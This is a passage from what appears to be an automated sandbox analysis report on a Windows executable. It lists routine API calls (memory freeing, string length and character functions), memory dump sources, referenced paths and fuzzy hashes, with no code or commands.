                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                          • GlobalFree.KERNEL32(007EC878), ref: 00403896
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-2145255484
                                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405ADC
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405AEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-3080008178
                                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700E115B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E11B4
                                                                          • GlobalFree.KERNEL32(?), ref: 700E11C7
                                                                          • GlobalFree.KERNEL32(?), ref: 700E11F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 1530a695360c14294d0f617ae40580318703368e287353fd56e165426f972cae
                                                                          • Instruction ID: 7b98d2ac5ec77eecf97539f8638b84c085c09649dcb371426547432eaddc0530
                                                                          • Opcode Fuzzy Hash: 1530a695360c14294d0f617ae40580318703368e287353fd56e165426f972cae
                                                                          • Instruction Fuzzy Hash: C6319AB2404200AFE711BF77DD89BAD7FF9EB05E70B2404E9EA46F2360D67498008B20
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8